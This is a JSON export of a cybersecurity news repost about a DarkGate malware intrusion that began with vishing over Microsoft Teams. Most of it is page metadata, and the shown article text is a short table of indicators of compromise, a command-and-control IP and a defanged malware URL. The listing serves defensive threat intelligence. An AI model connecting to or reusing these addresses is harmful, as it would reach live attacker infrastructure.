valign=\"top\"><b>Category<\/b><\/td>\n<\/tr>\n<tr>\n<td width=\"342\">179.60.149.194<\/td>\n<td width=\"138\">Dangerous<\/td>\n<td width=\"246\" valign=\"top\">C&C Server<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"342\">hxxp:\/\/179[.]60[.]149[.]194:8080\/fdgjsdmt<\/td>\n<td width=\"138\">Dangerous<\/td>\n<td width=\"246\" valign=\"top\">Malware Accomplice<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><\/center> <\/div>\n<\/p><\/div>\n<\/p><\/div>\n<section class=\"tag--list\">\n<p>Tags<\/p>\n<\/section>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p>   <\/p>\n<p> <span>sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk<\/span> <\/p>\n<p>  <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/l\/darkgate-malware.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In this blog entry, we discuss a social engineering attack that tricked the victim into installing a remote access tool, triggering DarkGate malware activities and an attempted C&C connection. Read More HERE…<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9511,9534,9509],"class_list":["post-57857","post","type-post","status-publish","format-standard","hentry","category-trendmicro","tag-trend-micro-research-cyber-threats","tag-trend-micro-research-latest-news","tag-trend-micro-research-research"],"yoast_head":"\n<title>Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2024-12-13T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/DarkGate-thumbnail:Large?qlt=80\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"12 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion\",\"datePublished\":\"2024-12-13T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\\\/\"},\"wordCount\":2367,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/DarkGate-thumbnail:Large?qlt=80\",\"keywords\":[\"Trend Micro Research : Cyber Threats\",\"Trend Micro Research : Latest News\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\\\/\",\"name\":\"Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/DarkGate-thumbnail:Large?qlt=80\",\"datePublished\":\"2024-12-13T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\\\/#primaryimage\",\"url\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/DarkGate-thumbnail:Large?qlt=80\",\"contentUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/DarkGate-thumbnail:Large?qlt=80\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Cyber Threats\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-cyber-threats\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n","yoast_head_json":{"title":"Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\/","og_locale":"en_US","og_type":"article","og_title":"Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2024-12-13T00:00:00+00:00","og_image":[{"url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/DarkGate-thumbnail:Large?qlt=80","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"12 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion","datePublished":"2024-12-13T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\/"},"wordCount":2367,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/DarkGate-thumbnail:Large?qlt=80","keywords":["Trend Micro Research : Cyber Threats","Trend Micro Research : Latest News","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\/","url":"https:\/\/www.threatshub.org\/blog\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\/","name":"Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/DarkGate-thumbnail:Large?qlt=80","datePublished":"2024-12-13T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\/#primaryimage","url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/DarkGate-thumbnail:Large?qlt=80","contentUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/DarkGate-thumbnail:Large?qlt=80"},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Cyber Threats","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-cyber-threats\/"},{"@type":"ListItem","position":3,"name":"Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/57857","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=57857"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/57857\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=57857"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=57857"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=57857"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

{"id":57857,"date":"2024-12-13T00:00:00","date_gmt":"2024-12-13T00:00:00","guid":{"rendered":"urn:uuid:bbca78ca-12a5-1156-d3e7-9cc32d5d4818"},"modified":"2024-12-13T00:00:00","modified_gmt":"2024-12-13T00:00:00","slug":"vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/vishing-via-microsoft-teams-facilitates-darkgate-malware-intrusion\/","title":{"rendered":"Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion"},"content":{"rendered":"